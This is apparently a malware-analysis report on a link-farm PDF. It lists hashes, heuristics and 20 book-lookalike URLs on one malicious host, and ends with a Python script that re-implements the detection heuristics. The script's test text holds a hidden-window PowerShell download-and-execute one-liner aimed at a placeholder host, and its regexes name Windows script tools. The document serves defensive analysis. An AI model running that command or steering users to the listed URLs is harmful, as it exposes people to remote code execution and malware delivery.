Malicious PDF — malware analysis report

Static analysis result for SHA-256 0a2a14c4c31acc06…

Verdict: MALICIOUS
File type: PDF
Size: 29.0 KB
Created: 2020-03-20 10:09:23 +00:00
Authoring application: mPDF 5.7
MD5: 729c8f5065e91fc2b7db2d01ab867f1a
SHA-1: c21ad750e80f7238685de55b1a3c920b0caa9e7b
SHA-256: 0a2a14c4c31acc066fb76993a6012145b5be0dbf497dd8b7e9aacfbb57c77394
Risk Score: 132

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment

The PDF embeds 20 clickable external URLs, all on the single host hicsniso.myhome.cx and named to look like downloadable books. The heuristics classify this as a generated SEO link farm: a 29 KB mPDF-produced carrier built to manipulate search results and route readers into malicious or unwanted-software delivery chains, not a document that cites sources. The ML classifier independently scored the file as malicious with high confidence (0.9895). No scripts were extracted, so the verdict rests on three signals: the single-host link-farm pattern, the LOLBin token sequence found in the document text, and the classifier score. Treat the listed URLs as indicators to block and hunt for rather than as proof of what each currently serves, since the pages behind link-farm hosts change over time.

Machine Learning

  • Nyx PDF Classifier: malicious score 0.9895

Heuristics (3)

  • PDF_SEO_LINK_FARM (critical): Small PDF contains mass external PDF link farm
    Small PDF contains many clickable external PDF links, mostly clustered on one host. This matches generated SEO/link-farm PDF carriers used to route users into malicious or unwanted-software delivery chains, rather than a normal document citation pattern. Here all 20 extracted links sit on hicsniso.myhome.cx.
  • SE_LOLBIN_RUN_COMMAND (high): LOLBin token sequence in document text
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, ...) within 220 characters of a dangerous flag, command verb, or URL. This is the pattern of a visible "run this" instruction in HTML/PDF/RTF lure bodies, or, in macro-laden Office files, of the macro's own string-pool entries appearing adjacent in extracted text. The matching text is not reproduced in this report, so extract the document text yourself and confirm the hit before treating it as a lure instruction.
  • EMBEDDED_URL (info): Embedded URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels (not reproduced in this extract) for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://hicsniso.myhome.cx/9e53e51e59e53e51/The-Complete-History-of-Aviation-From-Ballooning-to-Supersonic-Flight-by-Robert-Curley.pdf
    • http://hicsniso.myhome.cx/5e56e54e52e50e51/Articles-on-Aviation-Accidents-and-Incidents-in-1961-Including-Sabena-Flight-548-United-Airlines-Flight-859-Northwest-Orient-Airlines-Flight-706-1961-Cincinnati-Zantop-DC-4-Crash-Aero-Flight-311-1961-Yuba-City-B-52-Crash-by-Hephaestus-Books.pdf
    • http://hicsniso.myhome.cx/1e55e52e59e53/Flight-A-Panorama-Of-Aviation-by-Melvin-B-Zisfein.pdf
    • http://hicsniso.myhome.cx/6e50e57e58e59/Quest-for-Flight-John-J-Montgomery-and-the-Dawn-of-Aviation-in-the-West-by-Craig-S-Harwood.pdf
    • http://hicsniso.myhome.cx/1e51e58e57e56e50e57/Complete-Guide-To-Rutan-Homebuilt-Aircraft-Modern-Aviation-Series-by-Don-Downie.pdf
    • http://hicsniso.myhome.cx/6e55e54e50e57e50/Complete-Multilingual-Dictionary-Of-Aviation-And-Aeronautical-Terminology-English-French-Spanish-by-Henri-Demaison.pdf
    • http://hicsniso.myhome.cx/1e51e58e57e56e58e56/A-Century-of-Triumph-The-History-of-Aviation-by-Christopher-Chant.pdf
    • http://hicsniso.myhome.cx/9e53e51e55e58e53/James-Michael-Curley-by-Robert-Allison.pdf
    • http://hicsniso.myhome.cx/1e51e54e51e55e58e55/Technology-Innovation-of-Power-Transmission-Gearing-in-Aviation-by-Robert-F-Handschuh.pdf
    • http://hicsniso.myhome.cx/1e51e57e55e53e54e58/BHAGAVAD-GITA-MARATHI-Complete-Pocket-Size-984-pages-Portable-4x6-Inch-ONLY-418-gms-fits-in-purse-can-read-in-train-bus-flight-quot-BEST-SELLER-quot--Self-Help-Greatest-Motivational-Book-of-INDIA--ever-written-in-history-of-mankind-by-A-C-Bhaktivedanta-Swami-Prabhup-da.pdf
    • http://hicsniso.myhome.cx/9e53e51e57e56e57/The-Britannica-Guide-to-Inventions-That-Changed-the-Modern-World-by-Robert-Curley.pdf
    • http://hicsniso.myhome.cx/6e54e56e58e53e51/FAR-AIM-2007-Federal-Aviation-Regulations-Aeronautical-Information-Manual-by-Federal-Aviation-Administration.pdf
    • http://hicsniso.myhome.cx/9e53e51e57e55e54/Songs-Of-The-Sage-The-Poetry-Of-Curley-Fletcher-by-Curley-Fletcher.pdf
    • http://hicsniso.myhome.cx/7e55e57e57e50e51/History-of-the-Thirty-Years-War-Complete-History-of-the-Revolt-of-the-Netherlands-to-the-Confederacy-of-the-Gueux-by-Friedrich-Schiller.pdf
    • http://hicsniso.myhome.cx/9e53e51e55e58e58/Barney-Curley-Giving-A-Little-Back-by-Barney-Curley.pdf
    • http://hicsniso.myhome.cx/1e51e50e55e57e57e59/The-Flight-of-Georgiana-by-Robert-Neilson-Stephens.pdf
    • http://hicsniso.myhome.cx/8e51e50e53e54e56/A-Complete-History-of-the-Invasions-of-England-Including-the-Most-Memorable-Battles-and-Sea-Fights-from-Julius-Caesar-Down-to-the-French-Landing-in-Wales-in-1796-The-Calamites-of-France-Being-a-Catalogue-of-French-Cruelties-with-a-Complete-by-Anonymous.pdf
    • http://hicsniso.myhome.cx/6e50e52e54e53e51/Andr-e-s-Story-the-Complete-Record-of-His-Polar-Flight-1897-by-S-A-Andr-e.pdf
    • http://hicsniso.myhome.cx/4e51e50e57e57e55/Nameless-Cults-The-Complete-Cthulhu-Mythos-Fiction-of-Robert-E-Howard-by-Robert-E-Howard.pdf
    • http://hicsniso.myhome.cx/2e55e58e53e57e55/The-Flight-of-the-Falcon-The-True-Story-of-the-Escape-amp-Manhunt-for-America-s-Most-Wanted-Spy-by-Robert-Lindsey.pdf
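As an added example, not part of this report and not the analysis engine's own code, the following Python script re-implements the two scoring heuristics described above, PDF_SEO_LINK_FARM and SE_LOLBIN_RUN_COMMAND, over constructed inputs so the logic can be reproduced and tuned locally. The thresholds, the tool names beyond those the report lists, the placeholder hosts link-farm.example and example.invalid, the sample lure text and the minimal PDF builder are all assumptions of the example, not values taken from the sample.

```python
import re
from collections import Counter
from urllib.parse import urlparse

# ---------- Heuristic 1: PDF_SEO_LINK_FARM ----------
# Pull /URI link-annotation targets straight out of the raw PDF bytes.
# Caveat: this only sees literal "(...)" strings in uncompressed objects. URIs
# written as hex strings or packed into compressed object streams (/ObjStm)
# need a real PDF parser; a low link count here is not proof of few links.
URI_RE = re.compile(rb"/URI\s*\(((?:[^()\\]|\\.)*)\)")

def extract_uri_links(pdf_bytes):
    """Return every /URI target found in the PDF, decoded as Latin-1."""
    return [m.group(1).decode("latin-1") for m in URI_RE.finditer(pdf_bytes)]

def link_farm_score(pdf_bytes, min_links=10, max_size=64 * 1024, cluster_ratio=0.8):
    """Fire when a small PDF carries many external links that mostly share one
    host. The three thresholds are assumptions, not the report's values."""
    links = extract_uri_links(pdf_bytes)
    hosts = Counter(
        urlparse(u).hostname for u in links if urlparse(u).scheme in ("http", "https")
    )
    top_host, top_count = (hosts.most_common(1) or [(None, 0)])[0]
    external = sum(hosts.values())
    share = top_count / external if external else 0.0
    fired = len(pdf_bytes) <= max_size and external >= min_links and share >= cluster_ratio
    return {"links": external, "top_host": top_host, "share": round(share, 3), "fired": fired}

def build_pdf(urls):
    """Constructed sample: a minimal, uncompressed, xref-less PDF whose single
    page carries one /Link annotation per URL. A stand-in for the analysed file."""
    annots = [
        (f"{i} 0 obj << /Type /Annot /Subtype /Link /Rect [0 0 100 20] "
         f"/A << /S /URI /URI ({u}) >> >> endobj").encode("latin-1")
        for i, u in enumerate(urls, start=4)
    ]
    refs = " ".join(f"{i} 0 R" for i in range(4, 4 + len(urls)))
    header = [
        b"%PDF-1.4",
        b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj",
        b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj",
        (f"3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] "
         f"/Annots [{refs}] >> endobj").encode("latin-1"),
    ]
    return b"\n".join(header + annots + [b"%%EOF"])

# Constructed link set: eleven book-lookalike links on one placeholder host plus
# one unrelated link, mirroring the single-host clustering seen in the report.
FARM_URLS = [f"http://link-farm.example/{i}e5{i}e5{i}/Aviation-Title-{i}.pdf" for i in range(11)]
FARM_URLS.append("http://example.invalid/contact")

# ---------- Heuristic 2: SE_LOLBIN_RUN_COMMAND ----------
# Tool names the report lists, plus a few common extras (assumption).
LOLBIN_RE = re.compile(
    r"\b(powershell|pwsh|mshta|cmd|rundll32|regsvr32|wscript|cscript|certutil|bitsadmin)"
    r"(?:\.exe)?\b", re.I)
# Dangerous neighbours: encoded/hidden-window flags, run/download verbs, URLs (assumption).
DANGER_RE = re.compile(
    r"(-e(?:nc(?:odedcommand)?)?\b|-nop\b|-w(?:indowstyle)?\s+hidden|/c\b|\biex\b"
    r"|invoke-expression|downloadstring|downloadfile|https?://\S+)", re.I)

def lolbin_run_command(text, window=220):
    """Return (tool, neighbour) pairs for each LOLBin name that sits within
    `window` characters of a dangerous flag, verb or URL in extracted text."""
    hits = []
    for m in LOLBIN_RE.finditer(text):
        lo, hi = max(0, m.start() - window), min(len(text), m.end() + window)
        d = DANGER_RE.search(text[lo:hi])
        if d:
            hits.append((m.group(1).lower(), d.group(0)))
    return hits

# Constructed document texts: a "run this" lure and an innocent aviation sentence.
LURE_TEXT = ("Protected document. To view it, press Win+R and run: "
             "powershell -nop -w hidden -c \"iex ((New-Object Net.WebClient)"
             ".DownloadString('http://example.invalid/view.txt'))\"")
BENIGN_TEXT = "The flight engineer read the cmd panel while the crew reviewed the checklist."

if __name__ == "__main__":
    print(link_farm_score(build_pdf(FARM_URLS)))
    print(link_farm_score(build_pdf(["http://a.example/x", "http://b.example/y"])))
    print(lolbin_run_command(LURE_TEXT), lolbin_run_command(BENIGN_TEXT))
```

Run it against a real sample by passing the file's bytes to link_farm_score and text from a proper extractor (pdftotext or a PDF library) to lolbin_run_command; the second heuristic is deliberately noisy, since any tool name within 220 characters of a URL fires, so it is a triage signal to be read alongside the link-farm result rather than a verdict on its own.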